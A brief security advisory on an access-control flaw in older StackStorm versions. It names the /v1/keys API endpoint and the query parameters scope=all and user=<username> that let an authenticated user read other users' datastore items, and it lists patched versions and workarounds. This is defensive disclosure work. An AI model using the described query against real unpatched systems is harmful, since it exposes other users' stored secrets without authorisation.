Alexandre Juma

**Name of the Vulnerable Software and Affected Versions** StackStorm versions prior to 2.9.2 StackStorm versions 2.10.x prior to 2.10.1 **Description** The issue is related to incorrect access control in the StackStorm API, allowing an authenticated attacker with a StackStorm account to retrieve datastore items for other users. This can be achieved by utilizing the /v1/keys API endpoint with specific query filter parameters, such as `?scope=all` and `?user=<username>`. It is noted that Enterprise editions with RBAC enabled are not affected. **Recommendations** For StackStorm versions prior to 2.9.2, update to version 2.9.2 or later. For StackStorm versions 2.10.x prior to 2.10.1, update to version 2.10.1 or later. As a temporary workaround, consider restricting access to the /v1/keys API endpoint to minimize the risk of exploitation. Avoid using the `scope` and `user` query filter parameters in the affected API endpoint until the issue is resolved.